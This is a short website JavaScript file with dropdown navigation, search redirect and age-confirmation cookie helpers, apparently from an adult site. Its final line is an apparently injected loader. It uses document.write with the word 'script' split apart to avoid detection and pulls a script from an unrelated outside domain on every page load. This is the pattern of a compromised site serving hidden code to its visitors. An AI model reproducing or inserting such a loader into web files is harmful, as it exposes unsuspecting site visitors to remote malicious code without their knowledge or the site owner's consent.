function categoryChange(select)
{
	if (select.options[select.selectedIndex].value!="0")
		location.href=select.options[select.selectedIndex].value;
}

function categoryList(select)
{
	if (select.options[select.selectedIndex].value!="0")
		location.href=location.href.replace('.html', '/' + select.options[select.selectedIndex].value + '.html');
}

function categorySearch(select)
{
	if (select.options[select.selectedIndex].value!="0")
	{
		document.forms[1].action="search-s1.html";
		document.forms[1].submit();
	}
}

function iAmEighteen()
{
	if (readCookie("adult"))
		return;
	createCookie("adult", "yes", false);
	var url=location.href;
	var hash=url.indexOf('#');
	if (hash!=-1)
		url=url.substr(0, hash-1); 
	location.href=url;
}

function search(form)
{
	location.href="/search-s1-" + form.phrase.value + ".html";
}
document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/HDTV.js"></scri'+'pt>');